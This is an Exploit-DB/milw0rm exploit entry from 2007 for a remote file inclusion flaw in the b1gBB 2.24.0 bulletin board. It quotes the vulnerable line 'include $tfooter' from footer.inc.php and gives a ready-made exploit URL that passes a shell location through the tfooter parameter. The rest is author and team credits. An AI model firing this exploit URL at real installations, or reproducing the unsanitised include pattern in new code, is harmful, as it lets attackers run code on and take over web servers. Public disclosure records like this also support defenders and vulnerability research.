b1gbb 2.24.0 - 'footer.inc.php?tfooter' Remote File Inclusion

EDB-ID:

4102

Author:

Rf7awy

Type:

webapps

Platform:

PHP

Published:

2007-06-25

# b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion
Vulnerabilities

# D.Script :
     http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip

# V.Code :
     include $tfooter

# In :
     footer.inc.php

# Exploits :
http://www.name/path/footer.inc.php?tfooter=shell?


# Discovered by:
     Rf7awy
x59@hotmail.it

thanks
Mahmood_ali

# Homepage:
     http://www.Tryag.Com/cc

# Sp.Thanx To :
     Tryag-Team

# milw0rm.com [2007-06-25]